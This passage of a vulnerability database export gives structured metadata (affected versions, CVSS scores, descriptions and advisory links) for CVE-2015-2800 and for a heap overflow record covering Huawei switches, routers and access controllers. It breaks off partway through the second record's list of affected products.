                              cpe_name: [],
                              versionEndIncluding: "v200r001c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r001c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r001c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "v200r001c00spc300",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:campus_s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2015-2800",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "vhunter",
      sources: [
         {
            db: "BID",
            id: "73355",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201504-531",
         },
      ],
      trust: 0.9,
   },
   cve: "CVE-2015-2800",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2015-2800",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-80761",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2015-2800",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2015-2800",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201504-531",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-80761",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-80761",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
         {
            db: "NVD",
            id: "CVE-2015-2800",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201504-531",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The user authentication module in Huawei Campus switches S5700, S5300, S6300, and S6700 with software before V200R001SPH012 and S7700, S9300, and S9700 with software before V200R001SPH015 allows remote attackers to cause a denial of service (device restart) via vectors involving authentication, which trigger an array access violation. Huawei Campus Series Switches are prone to a denial-of-service vulnerability. \nAttackers can exploit this issue to restart the affected device, denying service to legitimate users. Huawei Campus switches S5700, etc. are all switch products of China's Huawei (Huawei). The user authentication module is a module for user login authentication. The following products and versions are affected: Huawei Campus switches S5700 V200R001SPH012 Version; Campus switches S5300 V200R001SPH012 Version; Campus switches S6300 V200R001SPH012 Version; Campus switches S6700 V200R001SPH012 Version; Campus switches S7700 V200R001SPH012 Version; Campus switches S9300 V200R001SPH012 Version; Campus switches S9700 V200R001SPH012 Version",
      sources: [
         {
            db: "NVD",
            id: "CVE-2015-2800",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
         {
            db: "BID",
            id: "73355",
         },
         {
            db: "VULHUB",
            id: "VHN-80761",
         },
      ],
      trust: 1.98,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2015-2800",
            trust: 2.8,
         },
         {
            db: "BID",
            id: "73355",
            trust: 2,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007609",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201504-531",
            trust: 0.7,
         },
         {
            db: "VULHUB",
            id: "VHN-80761",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-80761",
         },
         {
            db: "BID",
            id: "73355",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
         {
            db: "NVD",
            id: "CVE-2015-2800",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201504-531",
         },
      ],
   },
   id: "VAR-201706-0187",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-80761",
         },
      ],
      trust: 0.66499138,
   },
   last_update_date: "2023-12-18T13:29:17.104000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Huawei-SA-20150319-01-Campus switch",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/hw-418554",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-287",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-80761",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
         {
            db: "NVD",
            id: "CVE-2015-2800",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/bid/73355",
         },
         {
            trust: 1.7,
            url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-418554.htm",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2800",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2015-2800",
         },
         {
            trust: 0.3,
            url: "http://www.huawei.com/",
         },
         {
            trust: 0.3,
            url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-418554.htm",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-80761",
         },
         {
            db: "BID",
            id: "73355",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
         {
            db: "NVD",
            id: "CVE-2015-2800",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201504-531",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-80761",
         },
         {
            db: "BID",
            id: "73355",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
         {
            db: "NVD",
            id: "CVE-2015-2800",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201504-531",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2017-06-08T00:00:00",
            db: "VULHUB",
            id: "VHN-80761",
         },
         {
            date: "2015-03-19T00:00:00",
            db: "BID",
            id: "73355",
         },
         {
            date: "2017-07-07T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
         {
            date: "2017-06-08T16:29:00.403000",
            db: "NVD",
            id: "CVE-2015-2800",
         },
         {
            date: "2015-03-19T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201504-531",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2017-06-20T00:00:00",
            db: "VULHUB",
            id: "VHN-80761",
         },
         {
            date: "2015-05-07T17:22:00",
            db: "BID",
            id: "73355",
         },
         {
            date: "2017-07-07T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
         {
            date: "2017-06-20T13:20:13.737000",
            db: "NVD",
            id: "CVE-2015-2800",
         },
         {
            date: "2017-06-09T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201504-531",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201504-531",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Campus Service operation interruption in user authentication module of switch products  (DoS) Vulnerabilities",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2015-007609",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "authorization issue",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201504-531",
         },
      ],
      trust: 0.6,
   },
}

var-201801-0045
Vulnerability from variot

Multiple heap-based buffer overflows in the eSap software platform in Huawei Campus S9300, S7700, S9700, S5300, S5700, S6300, and S6700 series switches; AR150, AR160, AR200, AR1200, AR2200, AR3200, AR530, NetEngine16EX, SRG1300, SRG2300, and SRG3300 series routers; and WLAN AC6005, AC6605, and ACU2 access controllers allow remote attackers to cause a denial of service (device restart) via a crafted length field in a packet. plural Huawei The product contains a buffer error vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiCampusS9300 and other products are all products of China Huawei. CampusS9300 and other devices are all switch devices. WLAN AC6005 and so on are all access controller devices. eSapsoftwareplatform is a set of ESAP software platforms running on it. A heap buffer overflow vulnerability exists in eSapsoftwareplatform in several Huawei products. The Campus S9300 and others are switches. The following products and versions are affected: Huawei Campus S9300/ S7700/ S9700 Series switch V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC500 Version; Campus S5300/ S5700/ S6300/ S6700 Series switch V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; AR150/ AR160/ AR200/ AR1200/ AR2200/ AR3200/ AR530/ NetEngine16EX/ SRG1300/ SRG2300/ SRG3300 series router V200R003C01SPC900 Version, V200R003C01SPC300 Version, V200R003C01SPC100 Version, V200R003C00SPC200 Version, V200R003C00SPC100 Version, V200R005C00SPC100 Version, V200R005C00SPC200 Version; WLAN AC6005/6605 V200R003C00SPC100 Version, V200R003C00SPC200 Version, V200R003C00SPC300 Version , V200R003C00SPC500 version, V200R005C00SPC100 version; WLAN ACU2 V200R005C00SPC100 version

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201801-0045",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "wlan ac6605",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "wlan ac6005",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "wlan ac6605",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "wlan ac6605",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "wlan ac6005",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "wlan acu2",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "wlan ac6005",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "wlan ac6605",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "wlan ac6605",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "wlan ac6005",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "ar160",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "ar2200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "srg1300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "ar160",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "ar160",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "srg2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "ar1200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "ar2200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "ar160",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "netengine16ex",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "srg1300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "ar530",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "srg2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "ar530",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "srg2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "srg3300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "ar1200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "ar200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "ar530",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "netengine16ex",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "srg2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "ar150",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "srg3300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "ar1200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "ar2200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "ar1200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "ar200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "ar1200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "netengine16ex",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "ar200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "srg1300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "ar150",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "netengine16ex",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "netengine16ex",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "ar150",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "ar2200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "netengine16ex",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "ar2200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "ar160",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "ar2200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "srg3300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r002c00spc100",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "srg1300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "ar530",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "srg1300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "s7700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc500",
         },
         {
            model: "ar530",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "srg1300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "srg2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "ar200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "srg3300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "ar530",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "ar150",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "srg2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "srg3300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "s9300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r001c00spc300",
         },
         {
            model: "srg3300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc300",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "netengine16ex",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "srg3300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "ar160",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc200",
         },
         {
            model: "ar200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "ar1200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "ar200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "ar150",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc900",
         },
         {
            model: "wlan ac6005",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc100",
         },
         {
            model: "ar3200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c01spc100",
         },
         {
            model: "ar150",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc200",
         },
         {
            model: "ar1200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "ar200",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00spc100",
         },
         {
            model: "srg1300",
            scope: "eq",
